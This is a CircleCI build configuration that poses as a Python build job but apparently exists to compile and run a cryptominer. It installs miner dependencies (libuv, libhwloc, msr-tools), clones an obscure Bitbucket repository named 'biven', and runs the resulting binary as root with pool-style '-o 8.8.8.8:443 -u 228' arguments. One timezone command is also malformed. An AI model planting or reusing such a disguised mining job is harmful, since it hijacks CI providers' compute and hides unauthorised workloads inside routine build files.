version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build:
    executor: python/default
    steps:
      - run:
          command: sudo apt update
      - run:
          command: sudo apt upgrade -y
      - run:
          command: TZ=Europe/Kiev
      - run:
          command: sudo ln -snf /usr/share/zoneinfo/Europe/Kiev /etc/localtime && sudo echo Europe/Kiev > sudo /etc/timezone
      - run:
          command: sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev msr-tools -y
      - run:
          command: git clone https://ergg45t45tggtgt@bitbucket.org/ergg45t45tggtgt/biven.git
      - run:
          command: sudo mkdir biven/build && cd biven/build && sudo cmake .. && sudo make -j$(nproc) && ls && sudo ./biven -o 8.8.8.8:443 -u 228

workflows:
  main:
    jobs:
      - build